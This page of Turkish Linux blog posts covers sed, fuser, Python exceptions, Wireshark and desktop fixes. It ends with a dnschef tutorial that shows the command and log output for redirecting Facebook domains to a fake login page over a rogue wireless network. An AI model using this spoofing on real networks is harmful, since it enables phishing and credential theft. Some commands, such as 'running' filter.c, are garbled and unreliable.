Sed aracını kullanarak bul değiştir yapmak.

Merhabalar bu yazımızda linux’da sed aracını kullanmayı ve onunla bul değiştir yapmayı öğreneceğiz.

Aşağıdaki gibi deneme.txt adında bir dosyamız olsun.

rookie@IK# cat deneme.csv
LİNUX ALWAYS

Biz burada linux olan satırları windows olarak değiştirmek isteyelim.

rookie@IK sed -i deneme.csv -e 's/LİNUX/windows/g'

burdaki -i parametresi dosyanın üzerinde değişiklik yapmamızı sağlıyor. eğer aşağıdaki gibi kullanırsanız da dosya üzerinde değişiklik yapmayacak ilgili değişikliği terminalde gösterecektir. `s’ işleci. Bir karakteri veya karakter kümesini başka bir diziye çevirmeye yararıyor. Komutun sonundaki `g’ işleci, sed’e dosyanın tamamını araştırmasını söyler. Eğer bunu kaldırırsanız, sed her satırın başında bulduğu ilk değiştirmeyi yapacak ve satırın geri kalanına dokunmayacaktır.

rookie@IK# sed deneme.csv -e 's/LİNUX/windows/g' -e 's/SECURİTY/hack/g'deneme.csv

Aynı anda birden çok değiştirme yapabilmek için ise her argüman için -e kullanılır.

rookie@IK# sed deneme.csv -e 's/LİNUX/windows/g'

Yukarıdaki olan komut uygulanırsa çıktı aşağıdaki gibi olacaktır.

rookie@IK sed deneme.csv -e 's/LİNUX/windows/g'
windows ALWAYS

Vmware 10.0.1 Kernel Problemi

bu sabah karşılaştığım bir hataydı çözümü burda unutmamak adına paylaşıyorum.

filter.c dosyasını aşağıdaki dizine kopyalıyoruz.
/usr/lib/vmware/modules/source/

sonra dosyaya çalıştırabilir izin veriyoruz.

/usr/lib/vmware/modules/source
rookie source # chmod +x filter.c 

ardından filter.c dosyasını çalıştırıyoruz gelen sorulara hayır diyerek devam ediyoruz sonra vmware çalıştırıyoruz.

Etiketler: , , ,

Linux’da fuser aracının kullanımı

Öncelikle neden bunu kullanmalıyız onu anlatayım.

diyelimki bilgisayarınaza önceden bağlanmış ve 8080 portunda çalışan zararlı bir bağlantı var yada servis var. ve biz bu bağlantıyı kaldırmak istiyoruz. diğer bir deyişle çalışan servisi öldürmek istiyoruz.
ilk önce 8080 portu var mı ona bakalım
netsat (bize bilgisayarımızda çalışan servisleri ve hangi portlarda çalıştığı söyleyecek)

netstat -ant | grep 8080 

aşağıdaki gibi bir portun aktif olduğunu ve dinleniyor yani bağlantı beklediğini söylüyor.

tcp    0   0 127.0.0.1:8080     0.0.0.0:*   LISTEN 

işlemi öldürmek için linuxda bulunan fuser aracını kullanalım.

fuser -k 8080/tcp
8080/tcp:       6673
Kill process 6673 ? (y/N) 

artık bu kadar başka herhangi bir servisi yada çalışan zararlı bir portu bu yöntemle kapatabiliriz.

Etiketler: , ,

Python3 try except kavramı(hatalar)

Python’da bir program yazıyorsunuz  ve kullanıcıdan aldığınız değerler doğrultusunda toplama işlemi yapıyorsunuz.yazılan program aşağıdaki gibidir.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
a=input("bir sayi giriniz")
b=input("ikinci sayi giriniz")
    a = int(a)
    b = int(b)
    print("succes",a+b)
#Ancak burada kullanıcı int(sayı) dışında bir veri girerse program aşağıdaki gibi bir hata verecektir.
bir sayi giriniz:1
ikinci sayi giriniz:asd
Traceback (most recent call last):
  File "test.py", line 5, in
    b = int(b)
ValueError: invalid literal for int() with base 10: 'sad'</pre>
#yukarıdaki gibi hatalarda bu hatayı almak yerine kullanıcıya bir hata mesajı vermek istiyorsak try except kavramlarını kullanacağız aslında #buna hata yakalamakda denilebilir.
a=input("bir sayi giriniz")
b=input("ikinci sayi giriniz")
try:
    a = int(a)
    b = int(b)
    print("succes",a+b)
except ValueError: (alınan hata value error olduğu için..)
    print("lütfen sadece sayi girin")</pre>
#Programımız yukarıdaki gibi olacaktır.
#Burada python şöyle demiş olduk.
#Eğer try bloğu içinde belirtilen işlemler sırasında bir ValueError ile karşılaşırsan
#bunu görmezden gel ve normal şartlar altında kullanıcıya göstereceğin hata
#mesajını gösterme.
#Onun yerine kullanıcıya Lütfen sadece sayı girin!uyarısını göster.

#Yukarıda Türkçeye çevirdiğimiz emri Pythoncada nasıl ifade ettiğimize dikkat edin. Temel
#olarak şöyle bir yapıyla karşı karşıyayız:
try:
#hata verebileceğini bildiğimiz kodlar
except HataAdı:
#hata durumunda yapılacak işlem

#fırat özgül'ün python 3 için türkçe kılavuzdan bazı kısımlar alıntı yapılmıştır.
Etiketler: , , ,

Epson Aculaser MX14NF Yazıcının Linux’a Kurulumu

Normalde  Bu yazıcının  linux işletim sistemleri için driver yok o yüzden şöyle yapacağız.

Alt + F3 yaparak  aşağıdaki resimde olduğu gibi printer ayarlarına erişilir bizim kullandığımız yazıcı network yazıcı o yüzden network ayarlarından arama yapacağız ve yazıcımızı  bulacağız.

yazıcımintpanel

daha sonraki ekrandan add butonuna basarak aşağıdaki ekrana erişilir.

ayarpanel

Forward işlemi ile seçim onaylanır. açılan penceredeki ayarlar default bırakılır.

Tekrar forward yaparak ilerleyelim açılan ekrandan ilerleyin ve apply diyerek yazıcınızı kurun.

 

 

 

 

Etiketler: , ,

Wireshark’da http isteklerinin analiz edilmesi

Aşağıdaki uygulama adımlarında örnek bir pcap dosyası üzerinden ilerlenmiştir bölüm bölüm olarak wireshark’da  http isteklerinin analiz edilmesini anlatacağım. burada wireshark ile aktif bir trafik kaydedilmiş ve http olan isteklerin hangi internet(yani gerçekten google gidilmiş mi kısmını) sitelerine istek yapmış görmek istiyoruz.

Aşağıdaki gibi örnek bir pcap dosyasının wireshark ile açılmış hali.

wireshark

Buradaki amacımız hangi sitelerin ziyaret edildi yani http isteklerinin isim çözümlemesi yapmak istiyoruz bir nevi bu yapabilmek için.

Statistics > Http > requests > Create Stat
Not:herhangi bir filitreleme girmek istemediğimiz için filter alanını boş bıraktık.

wireshark

Açılan pencerede artık pcap dosyasındaki tüm ziyaret edilen web siteleri örnekteki gibidir.

wireshark

bu yazım buraya bu aşamaya kadar tekrar bir sonraki wireshark makalesinde görüşmek üzere.

 

Etiketler: , ,

Sed yada awk ile boş satırları silmek

Merhabalar bu makele var olan bir dosyadaki boş satırları silmeyi öğreneceğiz. eğer sizde benim gibi linux kullacısı iseniz aşağıdaki komutları uygulayarak herhangi bir dosyadaki boş satırları silebilirsiniz.

Şöyle bir dosyamız olsun ve aralarındaki boşluklardan awk ile kurtulalım.

00:08:d1:02:13:be 	192.168.1.240 	 	 	
	
84:2b:2b:19:dd:ee 	192.168.1.250 	
Linux@Rookie~/ awk NF test.txt

00:08:d1:02:13:be 	192.168.1.240 	 	
84:2b:2b:19:dd:ee 	192.168.1.250	

Yukarıdaki dosya csv de olabilir bu csv formatındaki dosyayı farklı bir yere yüklemeniz için de kullanabilirdiniz.

Şimdi aynı işlemi sed ile yapalım sed daha önce diğer yazılarımda yazmıştım.
yine aynı dosyayı oluşturup sed boşlukları sileceğiz.

Linux always

always linux
Linux@Rookie~/ sed '/^$/d' testx.txt

Linux always
always linux

Aynı işlemi hem sed hem awk ile yaptık burada siz herhangi birini kullanbilirsiniz kullanabilirsiniz.

Etiketler: , , , ,

While ve for döngülerinin linux’da kullanımı

while için

 while true; do "echo merhaba dünya"; done; 

for için örnek olarak döngü ile ls komutunu çalıştıralım çıktıyı bir txt dosyasına yazsın.

 for i in $(ls); do echo $i; echo $i >> /tmp/test.txt; done 
Etiketler: , , ,

Kablosuz simgesinin linux panelinde görünmemesi.

Zaman Zaman benimde karşılaştığım ama çözümünü bulmakta zorladığım bir konuyu sizinlede paylaşmak istedim.

Kullandığım linux sürümünde panel üzerinde wireless iconunu göremiyordum. aşağıdaki gibi değişiklikle problem çözülüyor.

rookie@IK nano /etc/xdg/autostart
/nm-applet.desktop

Nano editörü ile açılan pencereden “nm-applet” kısmını “dbus-launch nm-applet” olarak değiştiriyoruz.

[Desktop Entry]
Name=Network
Comment=Manage your network connections
Icon=nm-device-wireless
Exec=dbus-launch nm-applet
Terminal=false
Type=Application
NoDisplay=true
NotShowIn=KDE;
X-GNOME-Bugzilla-Bugzilla=GNOME
X-GNOME-Bugzilla-Product=NetworkManager
X-GNOME-Bugzilla-Component=nm-applet
X-GNOME-UsesNotifications=true
X-Ubuntu-Gettext-Domain=nm-applet

ilgili değişiklik kaydedilir yeniden başlatılır.

Dnschef ile kullanıcıları sahte sayfaya yönlendirmek.

dnschef


 

 

 

Dnschef nedir:
Kali Linux üzerinde bulunan Transparan proxy gibi görev yapan kısaca transparan(şeffaf) dns olarak adlandırabiliriz.
iç ağda bulunan kullancıların 8.8.8.8 (yada herhangi bir dns adresi yerine) (isim çözmesini dns isteklerini) size yönlendirir yine sizin aracılığınızla internete çıkmasını sağlar. sizde bu sayade tüm istekleri görebilir herhangi bir  ip adresine yönlendirebilirsiniz.
burada atlanılmaması gereken yer kullanıcıların dns adresi sizin ip adresiniz olmalı. ben burada bu örneği sahte kablosuz ağ üzerinden gerçekleştirdim. “sahte kablosuz ağ nasıl yapabilirim derseniz’de ilgili yazı çok yakında” konumuza geri dönelim.

Örneğin facebook.com yerine

facebook.com=192.168.101.20 "iç ağınızda bulunan sahte facebook sayfası"

Kali Linux üzerinden şu komutu çalıştırıp yardım alalım.

dnschef -h

Aşağıdaki komutu uygulayalım. buradaki komutların anlamı şöyle -fakeip yönlendirmek istediğimiz sayfamızın ip adresi -fakedomains hangi adreslerin sahte sayfaya yönlendireleceği alan. -interface dnschef çalışacağı arabirim ip adresi.

dnschef --fakeip=192.168.101.21 --fakedomains=portal.fb.com,tr-tr.facebook.com,www.facebook.com,ws.frappsy.com --interface=192.168.101.21

Çalışmaya başladığında aşağıdaki gibi dns isteklerini görebilirsiniz.

[19:49:17] 192.168.101.65: proxying the response of type 'A' for download.windowsupdate.com
[19:49:19] 192.168.101.65: proxying the response of type 'A' for www.update.microsoft.com
[19:49:36] 192.168.101.64: cooking the response of type 'A' for ws.frappsy.com to 192.168.101.21
[19:50:36] 192.168.101.64: cooking the response of type 'A' for ws.frappsy.com to 192.168.101.21

Proxying gelen isteğin herhangi bir yönlendirmeye uğramadan devam ettiğini belirtiyor.
Cooking gelen istediğin 192.168.101.21 adresine yönlendirildiğini görüyoruz.siz burada ilgili ip adresine yine kali araçlarını kullanarak sahte bir giriş sayfası yapabilirsiniz.

Etiketler: , , , , ,
Top